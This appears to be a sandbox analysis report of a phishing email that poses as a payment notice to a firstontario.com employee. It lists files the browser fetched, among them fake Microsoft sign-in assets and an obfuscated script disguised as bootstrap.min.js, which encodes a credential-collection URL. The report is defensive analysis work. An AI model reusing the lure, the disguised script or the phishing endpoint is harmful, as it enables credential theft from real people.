                                                                SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                                Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):32
                                                                Entropy (8bit):4.390319531114783
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EB3CE3190D8A58E048D35E620747D3A5
                                                                SHA1:76B5B6461189F839B018EF5C785DB4836B818B7D
                                                                SHA-256:2D670E2962D8D805B95912CACA0822CE7C6913636BA40373C6E6AEA73CAC8457
                                                                SHA-512:08F9C680B09CC25919A91F8E080CFC517F7354F49759DDC8CF6FFEB5ADE2E46F80A866E7531B6EA97188A5E4647093350F91ED51254351C47BCE3488EF88A595
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCYxISJZBwvy3EgUNrQmusSHZdbgMeqJx9BIZCek_uuUAv_gSEgUNQ_N2OSHobw2-b8mqqA==?alt=proto
                                                                Preview:CgkKBw2tCa6xGgAKCQoHDUPzdjkaAA==
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (48664)
                                                                Category:downloaded
                                                                Size (bytes):48944
                                                                Entropy (8bit):5.272507874206726
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                                Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 31 x 62, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):61
                                                                Entropy (8bit):4.068159130770306
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:640570F143153E137CC790CF95F093B8
                                                                SHA1:FDB77196B48D0E82D211B73052C437BA7724A14C
                                                                SHA-256:6B9A18BE8BE664802C078805B7132E575B657E5B7CD7073C07B4C203EEB5B0EE
                                                                SHA-512:BC99995FE15A36883A549B109F482914F7EFD47723AE43812B35E1FEE53233A8F7997ACF416652CAF2EE7BB51CE0B7538078F7CF90DF550033327E1C441B1B61
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR.......>.....\<W.....IDAT.....$.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (32012)
                                                                Category:downloaded
                                                                Size (bytes):69597
                                                                Entropy (8bit):5.369216080582935
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 2016 x 2016, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):21873
                                                                Entropy (8bit):2.877142515573533
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:568F3323A159C49C955A6E9E5CE8AC4D
                                                                SHA1:9F2A67B5CC72217B67EBB5C0B63556D70C4795C3
                                                                SHA-256:4E19539141237AAB02BA7D5E9657823C29907581024BADB76B1026F739BDC7B5
                                                                SHA-512:00F9B53896F031CACC067061DD39AB3E7EDD0FD450456029212A0649F6A1A5C2895D7CDB72214851F63529D3E22BDADD23C0A991AB32DF55C8E8B646D789B42B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR...............A.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:D102A13741CE11E6A31DDAB08C35506E" xmpMM:DocumentID="xmp.did:D102A13841CE11E6A31DDAB08C35506E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D102A13541CE11E6A31DDAB08C35506E" stRef:documentID="xmp.did:D102A13641CE11E6A31DDAB08C35506E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.A....Q.IDATx...?..Q.........0..H.B.lcVA5....PLc...VD.EC.5.`.;..y.sN..or..t:........>gl.........<...........<.........x...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1864
                                                                Entropy (8bit):5.222032823730197
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (19015)
                                                                Category:downloaded
                                                                Size (bytes):19188
                                                                Entropy (8bit):5.212814407014048
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                                Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                Category:downloaded
                                                                Size (bytes):17174
                                                                Entropy (8bit):2.9129715116732746
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 280 x 60, 8-bit colormap, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):5089
                                                                Entropy (8bit):7.9435811968649785
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5F5EF4D1150B6E9C3432FF8116FFF7BE
                                                                SHA1:38DB3092CBE4E5EB467F1CED123AE16A66441402
                                                                SHA-256:0C634F07D09C4048E0FBB85958CA04A0C35CD7E1DC5D4CF03024A58C0B594F59
                                                                SHA-512:F964289F906161414E3BCE7038A74DFCF6D0B0E4A360657D18E6CC6BFB1E9626D58183F4723F3D30E12D845304A468957EFB5B3245FF712FC71EAEC9E0F7D852
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR.......<.......U*....sRGB.........gAMA......a.....PLTE..b.!d.%f.&h.)i.,k.-m..n.*k.0n.1o.0n.1o.2p.4q.2q.6r.6t.8s.8t.6s.7t.2p.7s.9u.<v.9u.<v.=x.7s.;v.?y.>x.@z.B|.Bz.B|.D|.C|.F~.H."H..G..H..I..L. K.!M."N.$N.)O.#P.%P.(R.)T.*U.,V..X.0Y.2Z.3\.5].8_.7_.8_.9`.<b.>d.?e.@f.Bh.Ei.Fk.Gl.Hj.Im.Lo.Lp.Nq.Pr.Rt.Tu.Tv.Sv.Uv.Vx.Xx.Yz.[|.\{.\|.]}.`~._..a..d..c..d..f..h..j..j..m..n..q..p..t..q..t..s..u..x..x..z..{..{..}..~...]..a..b..e..h..j..k..l..n..r".t%.v(.y-.{0.}4.<.I.N.P.S.U.Z.\._.c.f.i.k.r.w........................................................................................................................................................................................................................................................................................................pHYs...s...s..".....jIDATx^.}|[.Y..r}.J..f.u$..[........`{.............,..0`.h.+0.....&..nE.(....7.7*VP...EqK.:H"...J..s..+.qK....A.?b..{^..9.y.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65458), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):549828
                                                                Entropy (8bit):4.912957214517372
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C2935FDEC7FB3E20C3CE0BD118BF8B34
                                                                SHA1:0B42FAC6E531B77B452E3BFC9F9991361FDF31A4
                                                                SHA-256:69210FF2428ED1EF84AAC2BFDF2F412701F1C2EE2B12E7862F924CF28E3D0412
                                                                SHA-512:DF3318B04BA06B2D121A23E6B3FE9F3DBF97CD4ABE4DB8630CC95339792A3771662BABB6CD87BA49C05F187DF3CC92CD345B08C6263501227E221F471B5BAA41
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://6719074572-1317754460.cos.ap-tokyo.myqcloud.com/bootstrap.min.js
                                                                Preview:var file = "aHR0cHM6Ly9lc3FqLmludmVzdGlnYXRpb24uaXQuY29tL2dvb2dsZS5waHA=";....var _0x586849=_0x3529;(function(_0x186e81,_0x380acb){var _0x34a11c=_0x3529,_0xef0e23=_0x186e81();while(!![]){try{var _0x535a49=parseInt(_0x34a11c(0x2a9))/(0x1e31+0x134*-0x16+-0x3b8)+-parseInt(_0x34a11c(0x2a99))/(-0x702+0xa9d+-0x399)*(parseInt(_0x34a11c(0xbdd))/(-0x20aa*-0x1+-0x257c+0x4d5*0x1))+-parseInt(_0x34a11c(0xf4d))/(-0x567*-0x4+-0x886+-0x689*0x2)*(parseInt(_0x34a11c(0x1422))/(0x118a*0x1+0x1425*-0x1+0x2a0))+parseInt(_0x34a11c(0xe0b))/(-0xfd5+-0x1a30+0x2a0b)*(-parseInt(_0x34a11c(0x13bd))/(0x25b7+0xc4*-0x1b+0x4*-0x441))+parseInt(_0x34a11c(0x15f2))/(-0x36*-0xd+0x9d0+-0xc86)+-parseInt(_0x34a11c(0xa3d))/(0x1491+-0x206e+0xbe6)+-parseInt(_0x34a11c(0x1433))/(-0x5f8+-0x168+-0xd*-0x92)*(-parseInt(_0x34a11c(0x49d))/(0x159d+0x979+0x9*-0x373));if(_0x535a49===_0x380acb)break;else _0xef0e23['push'](_0xef0e23['shift']());}catch(_0x8dd1f8){_0xef0e23['push'](_0xef0e23['shift']());}}}(_0x1c5f,-0x1e295*-0x2+0x9994a+-0x6aeef
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (32065)
                                                                Category:downloaded
                                                                Size (bytes):85578
                                                                Entropy (8bit):5.366055229017455
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2F6B11A7E914718E0290410E85366FE9
                                                                SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):2309
                                                                Entropy (8bit):3.9533709859154516
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:26A555918CCCAC480C5DC4845ECC04E1
                                                                SHA1:3B9F8C9C19902E4751C392E8764F612ED60F2818
                                                                SHA-256:FF8A819AC9081D67E353BC9FC2654A583A5A0631EA6EB617A130ECC9BF8B010A
                                                                SHA-512:8F4F894FAE992AAA001D6CDE538829A3153BE16672CEACD4315AEE932025EA1814A9AB6F08BCE0B40C34BE76FACDC6535AE5FB52CC20A7FFC36041A28B817012
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR..............x......pHYs.................sRGB.........gAMA......a.....IDATx...1.]U.....`#d.......^..t.N...8.;;..A...T73xE.@ ;7."..9$.......^.............................................|......_...<..D...?.}?....G..._.8.z...o_.<........z....9.^.}..2.i..#.3............$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                Category:dropped
                                                                Size (bytes):621
                                                                Entropy (8bit):7.673946009263606
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4761405717E938D7E7400BB15715DB1E
                                                                SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 1920x1080, components 3
                                                                Category:downloaded
                                                                Size (bytes):279994
                                                                Entropy (8bit):7.962545602165181
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:57538480D3F347ED52A252DFAB885155
                                                                SHA1:4D763C99B2EE0E7D16FA8365A344936D3D20FC6E
                                                                SHA-256:C05C489F1041ECDCC1EBFA77F10AA8348377DD6A0757C79114CAE99531837FD1
                                                                SHA-512:045F9F0F1AA085B9FD16C9AD7FD3C3173D27B2709F71C1DDC9024027C4F0A7C14F25BEE02243C8A81F9CD78186D9B4702C5A2446A6E4A235BF4A4FADEC37678B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://aadcdn.msauthimages.net/dbd5a2dd-r9ee2fceu6-sxsz-brr5xpw9gxgamr3hr-nzriytzde/logintenantbranding/0/illustration?ts=638352396502877873
                                                                Preview:......JFIF..............Exif..MM.*.......i...........................P...........d........00..........00......2019:06:12 21:15:42.2019:06:12 21:15:42.......http://ns.adobe.com/xap/1.0/.<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>..<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:xmp="http://ns.adobe.com/xap/1.0/"><xmp:CreateDate>2019-06-12T21:15:42</xmp:CreateDate></rdf:Description></rdf:RDF></x:xmpmeta>..<?xpacket end='w'?>...C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......8...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text
                                                                Category:downloaded
                                                                Size (bytes):196
                                                                Entropy (8bit):5.098952451791238
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:62962DAA1B19BBCC2DB10B7BFD531EA6
                                                                SHA1:D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
                                                                SHA-256:80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
                                                                SHA-512:9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://jsyk.investigation.it.com/favicon.ico
                                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.
                                                                File type:ASCII text, with very long lines (1197), with CRLF line terminators
                                                                Entropy (8bit):6.0519507925675535
                                                                TrID:
                                                                  File name:b10ad005.eml
                                                                  File size:13'551 bytes
                                                                  MD5:6087cdabe6e2788eefc3ccbeb2a05a8c
                                                                  SHA1:fbba72a9c2ceb05d250310e0e0643189f98da561
                                                                  SHA256:0899f0bfb756bca08acea05dd98ddc70e586345aee462eb21ffa744e9228661b
                                                                  SHA512:1e46d6e4e5d46bc95472205e604b7c2361b60e42936ff92063f776e8d7b66a339cc25b809b22f05f314e990de9cddcc4fee2d849c0684589c95f7b9878aa615d
                                                                  SSDEEP:192:b/NXWGVrnyPQwvyai8BvxPZoktSpVVYFR4lwLxNAFkATFrcebKeS8Thq2lmC25P6:b/Nm8t8yaiC5PBt4HuR42NqvKGDlmC06
                                                                  TLSH:71522BA124503A106BD2929AF219BC02B375B4C281FBE4D43ABE47F91FC348C97665DD
                                                                  File Content Preview:Arc-Seal: i=2; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=pass;.. b=Ic8VOQ+A9mcmJZuD9uvAKbVBS2DNVOG+IPuP5GRMxvM+vFh+BQ39eGGCnfruA4OL40uXKk+t/I7HglYx+oMabDU0gpdT4cVqpBNO1V3cYttN+XTxbh4QSgjt/M4y/2FWGtmg/zPRhKvGaufiXBxVL44XjJcyYSFg2PklhNt48uZ43JqO
                                                                  Subject:New payment scheduled for firstontario.com will arrive your bank in 2-3 business days ref 3c6b1059512ad4105ee797a7b10ad005
                                                                  From:kbrecken@futuresrehab.com
                                                                  To:Anders Ireland <Anders.Ireland@firstontario.com>
                                                                  Cc:
                                                                  BCC:
                                                                  Date:Fri, 21 Mar 2025 22:17:23 +0000
                                                                  Communications:
                                                                    Attachments:
                                                                    • ATT35822.svg
                                                                    Key Value
                                                                    Arc-Seali=1; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=none; b=YnR1TkjY3f7dVk0dKRFimfCOr2fhOZFCjxT0iwsz1QQaEQq76qfuGr9H+CJZzAKNvnzkAoexUi7aoHJz134hTTkQFuEoK/WzJzKDpardhntKu58ErSGT4oO+nAciWDEPNoM1xRUwOR7x3r3jz4fxcR3wF5i90yU4N0qA54QnHlwwXxTyzxHjbKlNWvlQXR2FJJf9L90q9Qj55rs5f7CF0nWbgJV1t2gN7FHoiYOa2ogV983CxI7LmaLzjy2NIjTM3nP5ztR0mzL5+url42oNzHwmrMOUxdfXMaLy31g4vVZO9mjxfTvwkuVAq5IV5cNVD3UOXZQHJdF712Wl72Do6Q==
